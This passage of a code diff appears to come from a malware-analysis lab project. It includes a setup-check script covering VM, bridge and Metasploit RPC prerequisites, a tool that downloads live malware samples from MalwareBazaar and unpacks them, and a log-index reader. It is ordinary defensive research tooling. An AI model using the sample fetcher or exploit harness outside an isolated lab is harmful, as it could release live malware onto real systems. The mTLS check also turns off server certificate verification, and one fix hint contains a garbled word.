def to_dict(self) -> dict:
|
||||
return {
|
||||
"role": self.role,
|
||||
"checks": [dataclasses.asdict(c) for c in self.checks],
|
||||
"summary": self.summary(),
|
||||
}
|
||||
|
||||
def summary(self) -> dict:
|
||||
out = {"ok": 0, "warn": 0, "fail": 0, "skip": 0}
|
||||
for c in self.checks:
|
||||
out[c.status] = out.get(c.status, 0) + 1
|
||||
return out
|
||||
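The module docstring promises a non-zero exit when any red check fails, and `Report.summary()` supplies the counts that decision needs. A minimal sketch of that link follows, with hypothetical standalone functions rather than the doctor's own `main()`. Unlike `Report.summary()`, this version drops statuses outside the four known ones instead of tallying them.

```python
from collections import Counter

STATUSES = ("ok", "warn", "fail", "skip")


def summarize(statuses: list[str]) -> dict[str, int]:
    """Count each known status, reporting 0 for statuses never seen."""
    counts = Counter(statuses)
    return {s: counts.get(s, 0) for s in STATUSES}


def exit_code(summary: dict[str, int]) -> int:
    """Only failures are fatal; warnings and skips still exit 0."""
    return 1 if summary["fail"] > 0 else 0


red = summarize(["ok", "warn", "fail", "ok"])
green = summarize(["ok", "warn", "skip"])
```

Treating `warn` as non-fatal keeps the doctor usable in scripts on hosts that are deliberately off `main` or have a dirty tree.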
|
||||
|
||||
_JSON_MODE = False
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# helpers
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def _run(cmd: list[str], *, timeout: float = 5.0) -> tuple[int, str, str]:
|
||||
try:
|
||||
p = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
|
||||
return p.returncode, p.stdout.strip(), p.stderr.strip()
|
||||
except (FileNotFoundError, subprocess.TimeoutExpired) as e:
|
||||
return -1, "", str(e)
|
||||
|
||||
|
||||
def _path_exists(p: Path) -> bool:
|
||||
try:
|
||||
return p.exists()
|
||||
except PermissionError:
|
||||
return True # treat unreadable-but-present as present
|
||||
|
||||
|
||||
def _size_str(p: Path) -> str:
|
||||
try:
|
||||
return f"{p.stat().st_size // (1024*1024)} MiB"
|
||||
except OSError:  # PermissionError is a subclass of OSError
|
||||
return "(stat denied — re-run with sudo for size)"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# checks — repo
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def check_repo(report: Report, repo_root: Path) -> None:
|
||||
if not (repo_root / ".git").exists():
|
||||
report.add(Check(
|
||||
"repo: .git directory present",
|
||||
"warn",
|
||||
detail=f"running from {repo_root} which isn't a git checkout — fine for /opt/cis490 (cp -aT'd) but not the source clone",
|
||||
))
|
||||
return
|
||||
rc, head, _ = _run(["git", "-C", str(repo_root), "rev-parse", "--short=8", "HEAD"])
|
||||
rc2, branch, _ = _run(["git", "-C", str(repo_root), "rev-parse", "--abbrev-ref", "HEAD"])
|
||||
rc3, dirty, _ = _run(["git", "-C", str(repo_root), "status", "--porcelain"])
|
||||
rc4, log, _ = _run(["git", "-C", str(repo_root), "log", "-1", "--format=%s"])
|
||||
detail = f"{branch}@{head}: {log[:60]}"
|
||||
if branch != "main":
|
||||
report.add(Check(
|
||||
"repo: on main",
|
||||
"warn",
|
||||
detail=detail,
|
||||
fix=f"cd {repo_root} && git fetch && git checkout main && git pull",
|
||||
))
|
||||
else:
|
||||
report.add(Check("repo: on main", "ok", detail=detail))
|
||||
if dirty:
|
||||
report.add(Check(
|
||||
"repo: tree clean",
|
||||
"warn",
|
||||
detail=f"{len(dirty.splitlines())} changed or untracked files",
|
||||
))
|
||||
else:
|
||||
report.add(Check("repo: tree clean", "ok"))
|
||||
|
||||
rc5, behind, _ = _run(
|
||||
["git", "-C", str(repo_root), "rev-list", "--count", "HEAD..@{u}"],
|
||||
)
|
||||
if rc5 == 0 and behind.isdigit() and int(behind) > 0:
|
||||
report.add(Check(
|
||||
"repo: up to date with origin",
|
||||
"warn",
|
||||
detail=f"{behind} commits behind",
|
||||
fix=f"cd {repo_root} && git pull",
|
||||
))
|
||||
elif rc5 == 0:
|
||||
report.add(Check("repo: up to date with origin", "ok"))
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# checks — install
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def check_install(report: Report, role: str) -> None:
|
||||
install_root = Path("/opt/cis490")
|
||||
if not _path_exists(install_root):
|
||||
report.add(Check(
|
||||
"install: /opt/cis490 exists",
|
||||
"fail",
|
||||
fix=f"sudo $(pwd)/scripts/install-{role}.sh",
|
||||
))
|
||||
return
|
||||
report.add(Check("install: /opt/cis490 exists", "ok"))
|
||||
|
||||
venv_python = install_root / ".venv" / "bin" / "python"
|
||||
if _path_exists(venv_python):
|
||||
rc, ver, _ = _run([str(venv_python), "--version"])
|
||||
report.add(Check("install: venv python", "ok",
|
||||
detail=ver if rc == 0 else "(unreadable)"))
|
||||
else:
|
||||
report.add(Check(
|
||||
"install: venv python",
|
||||
"fail",
|
||||
fix=f"sudo /opt/cis490/scripts/install-{role}.sh",
|
||||
))
|
||||
|
||||
cfg_name = "lab-host.toml" if role == "lab-host" else "receiver.toml"
|
||||
cfg = Path("/etc/cis490") / cfg_name
|
||||
if _path_exists(cfg):
|
||||
try:
|
||||
with open(cfg, "rb") as f:
|
||||
tomllib.load(f)
|
||||
report.add(Check(f"config: {cfg}", "ok", detail="parses"))
|
||||
except PermissionError:
|
||||
# Mode 0640 root:cis490 is the install default. Doctor often
|
||||
# runs as the unprivileged user — file is fine, we just
|
||||
# can't read it from here.
|
||||
report.add(Check(
|
||||
f"config: {cfg}",
|
||||
"warn",
|
||||
detail="exists, can't read (mode 0640 root:cis490 — re-run with sudo for full audit)",
|
||||
))
|
||||
except tomllib.TOMLDecodeError as e:
|
||||
report.add(Check(
|
||||
f"config: {cfg}",
|
||||
"fail",
|
||||
detail=str(e),
|
||||
fix=f"sudo $EDITOR {cfg}",
|
||||
))
|
||||
else:
|
||||
report.add(Check(
|
||||
f"config: {cfg}",
|
||||
"fail",
|
||||
fix=f"sudo cp /opt/cis490/etc/{cfg_name}.example {cfg}",
|
||||
))
|
||||
|
||||
if role == "lab-host":
|
||||
env = Path("/etc/cis490/lab-host.env")
|
||||
if _path_exists(env):
|
||||
report.add(Check("config: lab-host.env", "ok"))
|
||||
else:
|
||||
report.add(Check(
|
||||
"config: lab-host.env",
|
||||
"fail",
|
||||
fix="sudo /opt/cis490/scripts/install-lab-host.sh "
|
||||
"# regenerates the env file",
|
||||
))
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# checks — certs (lab-host)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def check_certs_lab_host(report: Report) -> None:
|
||||
base = Path("/etc/cis490/certs")
|
||||
expected = ["wg-ca.pem", "lab-host.pem", "lab-host.key"]
|
||||
missing = [n for n in expected if not _path_exists(base / n)]
|
||||
if missing:
|
||||
report.add(Check(
|
||||
f"mTLS: certs at {base}",
|
||||
"fail",
|
||||
detail=f"missing: {missing}",
|
||||
fix="On the Pi: sudo /home/max/.env/wg-pki/scripts/"
|
||||
"deploy-cis490-cert.sh <host_id> <this-machine-wg-ip>",
|
||||
))
|
||||
return
|
||||
# Verify the chain.
|
||||
rc, out, err = _run([
|
||||
"openssl", "verify",
|
||||
"-CAfile", str(base / "wg-ca.pem"),
|
||||
str(base / "lab-host.pem"),
|
||||
])
|
||||
if rc == 0 and "OK" in out:
|
||||
report.add(Check("mTLS: cert chain validates", "ok",
|
||||
detail=out.splitlines()[0]))
|
||||
else:
|
||||
report.add(Check(
|
||||
"mTLS: cert chain validates",
|
||||
"fail",
|
||||
detail=err or out,
|
||||
fix="re-issue the leaf via wg-pki/scripts/deploy-cis490-cert.sh",
|
||||
))
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# checks — services
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def check_services(report: Report, role: str) -> None:
|
||||
services = (
|
||||
["cis490-receiver"]
|
||||
if role == "receiver"
|
||||
else ["cis490-shipper", "cis490-orchestrator"]
|
||||
)
|
||||
for svc in services:
|
||||
rc, state, _ = _run(["systemctl", "is-active", svc])
|
||||
if state == "active":
|
||||
report.add(Check(f"systemd: {svc} active", "ok"))
|
||||
elif state == "inactive":
|
||||
report.add(Check(
|
||||
f"systemd: {svc} active",
|
||||
"fail",
|
||||
detail="inactive",
|
||||
fix=f"sudo systemctl enable --now {svc}",
|
||||
))
|
||||
else:
|
||||
report.add(Check(
|
||||
f"systemd: {svc} active",
|
||||
"fail",
|
||||
detail=state or "unknown",
|
||||
fix=f"sudo journalctl -u {svc} --no-pager -n 30",
|
||||
))
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# checks — network (lab-host)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def check_network_lab_host(report: Report, cfg_path: Path) -> None:
|
||||
try:
|
||||
with open(cfg_path, "rb") as f:
|
||||
cfg = tomllib.load(f)
|
||||
except (FileNotFoundError, PermissionError, tomllib.TOMLDecodeError) as e:
|
||||
report.add(Check("net: lab-host.toml readable", "fail", detail=str(e)))
|
||||
return
|
||||
|
||||
receiver_url = cfg.get("receiver", {}).get("url", "")
|
||||
if not receiver_url.startswith("https://"):
|
||||
report.add(Check(
|
||||
"net: receiver.url present",
|
||||
"fail",
|
||||
detail=receiver_url,
|
||||
fix=f"edit {cfg_path}: receiver.url = 'https://collector.wg'",
|
||||
))
|
||||
return
|
||||
netloc = receiver_url.split("//", 1)[1].split("/", 1)[0]
|
||||
host, _, port_str = netloc.partition(":")
|
||||
port = int(port_str) if port_str else 443
|
||||
|
||||
try:
|
||||
ip = socket.gethostbyname(host)
|
||||
report.add(Check(f"net: DNS resolve {host}", "ok",
|
||||
detail=f"-> {ip}"))
|
||||
except socket.gaierror as e:
|
||||
report.add(Check(
|
||||
f"net: DNS resolve {host}",
|
||||
"fail",
|
||||
detail=str(e),
|
||||
fix=f"echo '10.100.0.1 {host}' | sudo tee -a /etc/hosts "
|
||||
"# wg-enroll provisions this on real lab hosts",
|
||||
))
|
||||
return
|
||||
|
||||
try:
|
||||
with socket.create_connection((host, port), timeout=5):
|
||||
report.add(Check(f"net: TCP {host}:{port} reachable", "ok"))
|
||||
except OSError as e:
|
||||
report.add(Check(
|
||||
f"net: TCP {host}:{port} reachable",
|
||||
"fail",
|
||||
detail=str(e),
|
||||
fix="check iptmonads is allowing the WG-side 443 + Caddy is up",
|
||||
))
|
||||
return
|
||||
|
||||
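# mTLS handshake: pull the client cert paths from cfg. Server-cert
|
||||
# verification is disabled below (CERT_NONE), so an "ok" here shows only
|
||||
# that the client cert/key load and the handshake completes.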
|
||||
ca = cfg.get("receiver", {}).get("ca_bundle")
|
||||
cert = cfg.get("receiver", {}).get("client_cert")
|
||||
key = cfg.get("receiver", {}).get("client_key")
|
||||
if not (ca and cert and key):
|
||||
report.add(Check("net: mTLS handshake to collector.wg",
|
||||
"skip", detail="cert paths not in config"))
|
||||
return
|
||||
try:
|
||||
ctx = ssl.create_default_context(cafile="/home/max/wg-pki/certs/caddy-root.crt"
|
||||
if Path("/home/max/wg-pki/certs/caddy-root.crt").exists()
|
||||
else None)
|
||||
ctx.load_cert_chain(certfile=cert, keyfile=key)
|
||||
ctx.check_hostname = False
|
||||
ctx.verify_mode = ssl.CERT_NONE
|
||||
with socket.create_connection((host, port), timeout=5) as sock:
|
||||
with ctx.wrap_socket(sock, server_hostname=host) as ssock:
|
||||
report.add(Check("net: mTLS handshake to collector.wg",
|
||||
"ok",
|
||||
detail=f"cipher={ssock.cipher()[0]}"))
|
||||
except (ssl.SSLError, OSError, FileNotFoundError) as e:
|
||||
report.add(Check(
|
||||
"net: mTLS handshake to collector.wg",
|
||||
"fail",
|
||||
detail=str(e),
|
||||
fix="sudo /home/max/wg-pki/scripts/deploy-cis490-cert.sh <host_id> <wg_ip> "
|
||||
"(rerun cert deploy)",
|
||||
))
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# checks — VM prereqs (lab-host)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def check_vm_prereqs(report: Report) -> None:
|
||||
if not _path_exists(Path("/dev/kvm")):
|
||||
report.add(Check(
|
||||
"vm: /dev/kvm",
|
||||
"fail",
|
||||
fix="ensure KVM kernel module is loaded; on x86 hosts: sudo modprobe kvm-intel || sudo modprobe kvm-amd",
|
||||
))
|
||||
else:
|
||||
report.add(Check("vm: /dev/kvm", "ok"))
|
||||
|
||||
if shutil.which("qemu-system-x86_64") is None:
|
||||
report.add(Check(
|
||||
"vm: qemu-system-x86_64 on PATH",
|
||||
"fail",
|
||||
fix="install qemu-system-x86 via the host package manager",
|
||||
))
|
||||
else:
|
||||
report.add(Check("vm: qemu-system-x86_64 on PATH", "ok"))
|
||||
|
||||
if shutil.which("zstd") is None:
|
||||
report.add(Check(
|
||||
"vm: zstd on PATH (shipper compression)",
|
||||
"fail",
|
||||
fix="install zstd via the host package manager",
|
||||
))
|
||||
else:
|
||||
report.add(Check("vm: zstd on PATH", "ok"))
|
||||
|
||||
images = Path("/var/lib/cis490/vm/images")
|
||||
alpine = images / "alpine-baseline.qcow2"
|
||||
cidata = images / "cidata.iso"
|
||||
if _path_exists(alpine):
|
||||
report.add(Check(f"vm: {alpine}", "ok",
|
||||
detail=_size_str(alpine)))
|
||||
else:
|
||||
report.add(Check(
|
||||
f"vm: {alpine}",
|
||||
"fail",
|
||||
fix=f"sudo /opt/cis490/scripts/fetch-alpine-baseline.sh {alpine}",
|
||||
))
|
||||
if _path_exists(cidata):
|
||||
report.add(Check(f"vm: {cidata}", "ok",
|
||||
detail=_size_str(cidata)))
|
||||
else:
|
||||
report.add(Check(
|
||||
f"vm: {cidata}",
|
||||
"fail",
|
||||
fix=f"sudo /opt/cis490/.venv/bin/python /opt/cis490/tools/build_cidata.py {cidata}",
|
||||
))
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# checks — Tier 3 (optional)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def check_tier3(report: Report) -> None:
|
||||
if shutil.which("msfrpcd") is None:
|
||||
report.add(Check(
|
||||
"tier3: msfrpcd on PATH",
|
||||
"warn",
|
||||
detail="optional — only needed for real exploit episodes",
|
||||
fix="sudo /opt/cis490/scripts/install-msfrpcd.sh",
|
||||
))
|
||||
else:
|
||||
report.add(Check("tier3: msfrpcd on PATH", "ok"))
|
||||
|
||||
# Probe whether msfrpcd is actually listening (tier-3 fleet
|
||||
# dispatch checks the same thing).
|
||||
msfrpcd_listening = False
|
||||
try:
|
||||
with socket.create_connection(("127.0.0.1", 55553), timeout=0.5):
|
||||
msfrpcd_listening = True
|
||||
except OSError:
|
||||
pass
|
||||
if msfrpcd_listening:
|
||||
report.add(Check("tier3: msfrpcd listening on 127.0.0.1:55553", "ok"))
|
||||
else:
|
||||
report.add(Check(
|
||||
"tier3: msfrpcd listening on 127.0.0.1:55553",
|
||||
"warn",
|
||||
detail="optional — fleet falls back to Tier 2 when down",
|
||||
fix="sudo systemctl enable --now cis490-msfrpcd",
|
||||
))
|
||||
|
||||
# Module catalog parses + at least one same-socket entry.
|
||||
modules_dir = Path("/opt/cis490/exploits/modules")
|
||||
if modules_dir.exists():
|
||||
try:
|
||||
from exploits.modules import load_module_configs as _load
|
||||
catalog = _load(modules_dir)
|
||||
same_socket = [k for k, v in catalog.items() if not v.requires_bridge]
|
||||
report.add(Check(
|
||||
"tier3: module catalog parses",
|
||||
"ok",
|
||||
detail=f"{len(catalog)} modules, {len(same_socket)} same-socket "
|
||||
f"({len(catalog) - len(same_socket)} need BRIDGE)",
|
||||
))
|
||||
except Exception as e:
|
||||
report.add(Check(
|
||||
"tier3: module catalog parses",
|
||||
"fail",
|
||||
detail=str(e),
|
||||
fix="check exploits/modules/*.toml syntax",
|
||||
))
|
||||
images = Path("/var/lib/cis490/vm/images")
|
||||
msf2 = images / "metasploitable2.qcow2"
|
||||
if _path_exists(msf2):
|
||||
report.add(Check(f"tier3: {msf2}", "ok",
|
||||
detail=_size_str(msf2)))
|
||||
else:
|
||||
report.add(Check(
|
||||
f"tier3: {msf2}",
|
||||
"warn",
|
||||
detail="optional — needed for Tier-3 episodes",
|
||||
fix="IMAGE_URL=… IMAGE_SHA256=… sudo /opt/cis490/scripts/fetch-metasploitable2.sh",
|
||||
))
|
||||
|
||||
|
||||
def check_bridge(report: Report) -> None:
|
||||
"""Bridge readiness — pcap (source 4) + reverse/bind callback
|
||||
payloads both need this. Without it, Tier-3 episodes that pick
|
||||
callback modules will fire but the session never lands."""
|
||||
rc, out, _ = _run(["ip", "-br", "link", "show", "br-malware"])
|
||||
if rc == 0 and "br-malware" in out:
|
||||
if "UP" in out or "UNKNOWN" in out:
|
||||
report.add(Check("bridge: br-malware up", "ok", detail=out.strip()[:80]))
|
||||
else:
|
||||
report.add(Check(
|
||||
"bridge: br-malware up",
|
||||
"warn",
|
||||
detail=out.strip()[:80],
|
||||
fix="sudo ip link set br-malware up",
|
||||
))
|
||||
else:
|
||||
report.add(Check(
|
||||
"bridge: br-malware exists",
|
||||
"warn",
|
||||
detail="optional — pcap capture + callback-payload Tier-3 "
|
||||
"modules require it",
|
||||
fix="sudo /opt/cis490/vm/setup_bridge.sh",
|
||||
))
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# checks — end to end (lab-host)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def check_end_to_end(report: Report) -> None:
|
||||
cfg = "/etc/cis490/lab-host.toml"
|
||||
if not _path_exists(Path(cfg)):
|
||||
report.add(Check("e2e: cis490-shipper --ping", "skip",
|
||||
detail="no lab-host.toml"))
|
||||
return
|
||||
rc, out, err = _run([
|
||||
"/opt/cis490/.venv/bin/python", "-m", "shipper",
|
||||
"--config", cfg, "--ping",
|
||||
], timeout=15.0)
|
||||
if rc == 0 and '"ok": true' in out:
|
||||
report.add(Check("e2e: cis490-shipper --ping", "ok",
|
||||
detail="200 OK"))
|
||||
else:
|
||||
report.add(Check(
|
||||
"e2e: cis490-shipper --ping",
|
||||
"fail",
|
||||
detail=(out or err)[:200],
|
||||
fix="paste this row's detail into a Forgejo issue or to the operator",
|
||||
))
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# main
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def main(argv: list[str] | None = None) -> int:
|
||||
global _JSON_MODE
|
||||
p = argparse.ArgumentParser(prog="cis490-doctor")
|
||||
p.add_argument("--role", choices=("lab-host", "receiver"), default="lab-host")
|
||||
p.add_argument("--json", action="store_true",
|
||||
help="machine-readable output (suppresses progressive printing)")
|
||||
p.add_argument("--no-tier3", action="store_true",
|
||||
help="skip the optional Tier-3 prerequisite checks")
|
||||
args = p.parse_args(argv)
|
||||
_JSON_MODE = args.json
|
||||
|
||||
repo_root = Path(__file__).resolve().parent.parent
|
||||
if not _JSON_MODE:
|
||||
print(f"{_ANSI_BOLD}cis490-doctor{_ANSI_RESET} role={args.role} repo={repo_root}\n")
|
||||
|
||||
report = Report(role=args.role)
|
||||
check_repo(report, repo_root)
|
||||
check_install(report, args.role)
|
||||
if args.role == "lab-host":
|
||||
check_certs_lab_host(report)
|
||||
check_services(report, args.role)
|
||||
if args.role == "lab-host":
|
||||
check_network_lab_host(report, Path("/etc/cis490/lab-host.toml"))
|
||||
check_vm_prereqs(report)
|
||||
check_bridge(report)
|
||||
if not args.no_tier3:
|
||||
check_tier3(report)
|
||||
check_end_to_end(report)
|
||||
|
||||
summary = report.summary()
|
||||
if _JSON_MODE:
|
||||
json.dump(report.to_dict(), sys.stdout, indent=2)
|
||||
print()
|
||||
else:
|
||||
print()
|
||||
print(f"{_ANSI_BOLD}summary:{_ANSI_RESET} "
|
||||
f"{_ANSI_GREEN}{summary['ok']} ok{_ANSI_RESET}, "
|
||||
f"{_ANSI_YELLOW}{summary['warn']} warn{_ANSI_RESET}, "
|
||||
f"{_ANSI_RED}{summary['fail']} fail{_ANSI_RESET}, "
|
||||
f"{_ANSI_DIM}{summary['skip']} skip{_ANSI_RESET}")
|
||||
if summary["fail"]:
|
||||
print(
|
||||
f"\n{_ANSI_BOLD}{_ANSI_RED}NOT READY.{_ANSI_RESET} "
|
||||
"Run the `fix:` commands above in order, then re-run "
|
||||
"`cis490-doctor`. When all rows are green/yellow, "
|
||||
"episodes will start shipping to the Pi."
|
||||
)
|
||||
else:
|
||||
print(
|
||||
f"\n{_ANSI_BOLD}{_ANSI_GREEN}READY.{_ANSI_RESET} "
|
||||
"Episodes should be flowing. Watch:\n"
|
||||
" sudo journalctl -u cis490-shipper -f\n"
|
||||
" ssh <pi> 'sudo tail -f /var/lib/cis490/index.jsonl'"
|
||||
)
|
||||
|
||||
return 1 if summary["fail"] else 0
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
sys.exit(main())
|
||||
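The network check above derives `host` and `port` from `receiver.url` with chained `split` calls. Below is a minimal sketch of the same extraction using the standard library's `urllib.parse.urlsplit`, assuming (as the check does) that a URL without an explicit port means 443. `host_and_port` is a hypothetical helper name, not something defined in this repo.

```python
from urllib.parse import urlsplit


def host_and_port(receiver_url: str, default_port: int = 443) -> tuple[str, int]:
    """Return (host, port) for a receiver URL. Hypothetical helper."""
    parts = urlsplit(receiver_url)
    if not parts.hostname:
        # e.g. "collector.wg" with no scheme: urlsplit treats it as a path.
        raise ValueError(f"no host in receiver.url: {receiver_url!r}")
    # parts.port is None when the URL carries no explicit port.
    return parts.hostname, parts.port or default_port


if __name__ == "__main__":
    print(host_and_port("https://collector.wg"))
    print(host_and_port("https://collector.wg:8443/ingest"))
```

One possible benefit of this form is that a URL with no `//` raises a `ValueError` with a readable message instead of an `IndexError` from the split chain.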
142
tools/fetch_sample.py
Normal file
|
|
@@ -0,0 +1,142 @@
|
|||
"""Fetch a malware sample by sha256 from MalwareBazaar.
|
||||
|
||||
Lands the binary at ``samples/store/<sha256>`` (gitignored), verifies
|
||||
the hash on the way in, and prints the resulting path on stdout.
|
||||
|
||||
Usage:
|
||||
|
||||
MALWAREBAZAAR_API_KEY=... uv run python tools/fetch_sample.py <sha256>
|
||||
|
||||
MalwareBazaar requires a free API key as of late 2023; sign up at
|
||||
https://bazaar.abuse.ch and either pass via env or place in
|
||||
``samples/.bazaar.token`` (mode 0600, gitignored). The downloaded
|
||||
zip is password-protected with ``infected``, per the MB convention.
|
||||
|
||||
The fetcher is intentionally read-only over the network — no upload,
|
||||
no metadata posted. On a tightly egress-firewalled WG mesh, run it once
on a build host and rsync the resulting
|
||||
``samples/store/`` directory across the fleet.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import argparse
|
||||
import hashlib
|
||||
import os
|
||||
import sys
|
||||
import urllib.parse
|
||||
import urllib.request
|
||||
import zipfile
|
||||
from pathlib import Path
|
||||
|
||||
|
||||
MB_ENDPOINT = "https://mb-api.abuse.ch/api/v1/"
|
||||
MB_ZIP_PASSWORD = b"infected"
|
||||
|
||||
|
||||
def _read_api_key(repo_root: Path) -> str | None:
|
||||
env = os.environ.get("MALWAREBAZAAR_API_KEY")
|
||||
if env:
|
||||
return env.strip()
|
||||
token = repo_root / "samples" / ".bazaar.token"
|
||||
if token.exists():
|
||||
return token.read_text().strip()
|
||||
return None
|
||||
|
||||
|
||||
def fetch_sample(
|
||||
sha256: str,
|
||||
out_dir: Path,
|
||||
api_key: str,
|
||||
*,
|
||||
timeout_s: float = 60.0,
|
||||
) -> Path:
|
||||
if len(sha256) != 64 or not all(c in "0123456789abcdef" for c in sha256.lower()):
|
||||
raise ValueError(f"sha256 must be 64 hex chars, got {sha256!r}")
|
||||
sha256 = sha256.lower()
|
||||
out_dir.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
target = out_dir / sha256
|
||||
if target.exists():
|
||||
actual = hashlib.sha256(target.read_bytes()).hexdigest()
|
||||
if actual == sha256:
|
||||
return target
|
||||
target.unlink() # tampered or partial; refetch.
|
||||
|
||||
body = urllib.parse.urlencode({
|
||||
"query": "get_file",
|
||||
"sha256_hash": sha256,
|
||||
}).encode("utf-8")
|
||||
req = urllib.request.Request(
|
||||
MB_ENDPOINT,
|
||||
data=body,
|
||||
headers={
|
||||
"Auth-Key": api_key,
|
||||
"User-Agent": "cis490-fetcher/0",
|
||||
},
|
||||
method="POST",
|
||||
)
|
||||
with urllib.request.urlopen(req, timeout=timeout_s) as r:
|
||||
payload = r.read()
|
||||
|
||||
if not payload.startswith(b"PK"):
|
||||
raise RuntimeError(
|
||||
f"MalwareBazaar returned non-zip response (first 200 bytes): "
|
||||
f"{payload[:200]!r}"
|
||||
)
|
||||
|
||||
zip_path = out_dir / f"{sha256}.zip"
|
||||
zip_path.write_bytes(payload)
|
||||
try:
|
||||
with zipfile.ZipFile(zip_path) as zf:
|
||||
zf.setpassword(MB_ZIP_PASSWORD)
|
||||
names = zf.namelist()
|
||||
if not names:
|
||||
raise RuntimeError(f"{sha256}: empty zip")
|
||||
with zf.open(names[0]) as src, target.open("wb") as dst:
|
||||
dst.write(src.read())
|
||||
finally:
|
||||
zip_path.unlink(missing_ok=True)
|
||||
|
||||
actual = hashlib.sha256(target.read_bytes()).hexdigest()
|
||||
if actual != sha256:
|
||||
target.unlink()
|
||||
raise RuntimeError(f"sha256 mismatch: expected {sha256}, got {actual}")
|
||||
return target
|
||||
|
||||
|
||||
def main(argv: list[str] | None = None) -> int:
|
||||
p = argparse.ArgumentParser(prog="fetch_sample")
|
||||
p.add_argument("sha256")
|
||||
p.add_argument(
|
||||
"--out-dir",
|
||||
type=Path,
|
||||
default=None,
|
||||
help="Where to drop <sha256> (default: samples/store/ relative to repo)",
|
||||
)
|
||||
args = p.parse_args(argv)
|
||||
|
||||
repo_root = Path(__file__).resolve().parent.parent
|
||||
out_dir = args.out_dir or (repo_root / "samples" / "store")
|
||||
|
||||
api_key = _read_api_key(repo_root)
|
||||
if not api_key:
|
||||
print(
|
||||
"no MalwareBazaar API key — set MALWAREBAZAAR_API_KEY or write "
|
||||
"samples/.bazaar.token (mode 0600). Register at "
|
||||
"https://bazaar.abuse.ch.",
|
||||
file=sys.stderr,
|
||||
)
|
||||
return 2
|
||||
|
||||
try:
|
||||
path = fetch_sample(args.sha256, out_dir, api_key)
|
||||
except Exception as e:
|
||||
print(f"fetch failed: {e}", file=sys.stderr)
|
||||
return 1
|
||||
print(path)
|
||||
return 0
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
sys.exit(main())
|
||||
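`fetch_sample` verifies the download by hashing `target.read_bytes()`, which holds the whole sample in memory. For large samples a chunked hash is one option. The sketch below is an illustration only: `sha256_file` and the 1 MiB default chunk size are assumptions, not part of this repo.

```python
import hashlib
from pathlib import Path


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in fixed-size chunks. Hypothetical helper."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        # iter() with a sentinel stops at the first empty read (EOF).
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()
```

The digest is identical to `hashlib.sha256(path.read_bytes()).hexdigest()`; only peak memory use differs.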
136
tools/index_reader.py
Normal file
|
|
@@ -0,0 +1,136 @@
|
|||
"""Read + filter the receiver's ``index.jsonl``.
|
||||
|
||||
Usage:
|
||||
|
||||
# All episodes from one host:
|
||||
cis490-index --host lab-host-1
|
||||
|
||||
# All episodes for a particular sample:
|
||||
cis490-index --sample xmrig-cryptominer
|
||||
|
||||
# Today's episodes, sorted by size:
|
||||
cis490-index --since 2026-04-30 --sort size
|
||||
|
||||
# Group/count by host:
|
||||
cis490-index --count-by host_id
|
||||
|
||||
The index file is the closest thing to a database the receiver has
|
||||
until we move to Postgres/Timescale. This tool is the temporary CLI
|
||||
view over it; it's intentionally read-only and never opens episode
|
||||
tarballs (just the index rows).
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import sys
|
||||
from collections import Counter
|
||||
from datetime import datetime, timezone
|
||||
from pathlib import Path
|
||||
|
||||
|
||||
DEFAULT_INDEX = "/var/lib/cis490/index.jsonl"
|
||||
|
||||
|
||||
def _parse_since(s: str) -> datetime:
|
||||
# Accept ISO-8601 with or without time.
|
||||
for fmt in ("%Y-%m-%dT%H:%M:%S%z", "%Y-%m-%d", "%Y-%m-%dT%H:%M:%S"):
|
||||
try:
|
||||
dt = datetime.strptime(s, fmt)
|
||||
if dt.tzinfo is None:
|
||||
dt = dt.replace(tzinfo=timezone.utc)
|
||||
return dt
|
||||
except ValueError:
|
||||
continue
|
||||
# Last resort: fromisoformat which handles a wider range in 3.11+.
|
||||
dt = datetime.fromisoformat(s)
|
||||
if dt.tzinfo is None:
|
||||
dt = dt.replace(tzinfo=timezone.utc)
|
||||
return dt
|
||||
|
||||
|
||||
def _row_time(row: dict) -> datetime | None:
|
||||
s = row.get("received_at_wall")
|
||||
if not s:
|
||||
return None
|
||||
try:
|
||||
return datetime.fromisoformat(s.replace("Z", "+00:00"))
|
||||
except ValueError:
|
||||
return None
|
||||
|
||||
|
||||
def main(argv: list[str] | None = None) -> int:
|
||||
p = argparse.ArgumentParser(prog="cis490-index")
|
||||
p.add_argument("--index", default=DEFAULT_INDEX,
|
||||
help=f"path to index.jsonl (default {DEFAULT_INDEX})")
|
||||
p.add_argument("--host", help="only rows from this host_id")
|
||||
p.add_argument("--sample",
|
||||
help="only rows whose meta.sample.name matches "
|
||||
"(requires meta.json from a recent commit)")
|
||||
p.add_argument("--since", help="ISO date or datetime; only rows received on/after")
|
||||
p.add_argument("--until", help="ISO date or datetime; only rows received before")
|
||||
